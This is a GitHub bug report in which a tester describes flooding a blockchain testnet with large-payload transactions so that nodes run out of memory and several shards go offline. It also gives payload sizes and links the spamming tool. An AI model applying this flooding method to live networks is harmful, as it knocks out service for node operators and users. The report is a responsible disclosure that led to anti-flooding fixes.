Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

chainum · 2019-12-12T13:43:42Z

Describe the bug
I wrote a tx sender/spammer tool that sends a lot of transactions with massive tx payloads and I unleashed it very briefly on the network to test my code.

The payload was alternated between the 4chan Navy Seal copypasta (499,500 bytes) and a base64-encoded image of the legendary Mr Bubz (126,896 bytes). The larger payload (499,500 bytes) was primarily used for better effect.

Seems that minor testing of this tool was sufficient to bring down shard 0, 1, 2 and 3. Some of my nodes sent about 200-400mb/s of data while the tool was active.

What I'm assuming happened is that the combination of the sheer amount of transactions coupled with the large payloads lead nodes to use a massive amount of memory for their pending tx pools/queues. Eventually some nodes allocated way too much memory and the OS stepped in to OOM reap said nodes.

This eventually lead to some shards not being able to form the consensus because of too many nodes getting shut down / being offline. It also seems that some of Elrond's internal nodes also were affected / were OOM reaped because of the exploit.

This attack is very similar to what I also did on Harmony's Pangaea testnet.

To Reproduce
Steps to reproduce the behavior:

See https://github.com/SebastianJ/elrond-tx-sender/ for usage instructions
GIven that some code is currently hard-coded (a bit pressed on time to report this ASAP) some code changes might be needed. Will make the tool more configurable as soon as this ticket has been submitted.

Expected behavior
The network and nodes should clearly be able to cope with this better - ideally using some kind of throughput throttling or flood protection (which is already on the way or fully implemented I've heard - but not yet deployed on BoN)

iulianpascalau · 2019-12-16T07:00:58Z

👍 great job creating such a tool! We are currently in heavy development with an anti-flooding capability component for the node. Can hardly wait to retest this when the patch is released.

chainum mentioned this issue Dec 15, 2019

Shard 0 Uses a high amount of other Ram #810

Closed

iulianpascalau added type:bug Something isn't working P0 labels Dec 16, 2019

iulianpascalau self-assigned this Dec 16, 2019

This was referenced Dec 16, 2019

Node crashed due to DB corruption #808

Closed

Peer connections eclipse attack #829

Closed

Explorer/API bugs and general improvement suggestions #872

Closed

iulianpascalau mentioned this issue Dec 23, 2019

Last block in shard 1 - 7 hour ago. #826

Closed

chainum mentioned this issue Feb 23, 2020

Non-determinism due to incorrect parameter caching oasisprotocol/oasis-core#2708

Closed

miiu96 closed this as completed May 14, 2020

chainum mentioned this issue Jun 11, 2020

[ATTACK] Tx spam DDoS/OOM-reaping attack #1926

Closed

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

chainum commented Dec 12, 2019 •

edited

Loading

iulianpascalau commented Dec 16, 2019

Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

Mass tx spam results in nodes using an excessive amount of memory (and eventually getting OOM reaped) #799

Comments

chainum commented Dec 12, 2019 • edited Loading

iulianpascalau commented Dec 16, 2019

chainum commented Dec 12, 2019 •

edited

Loading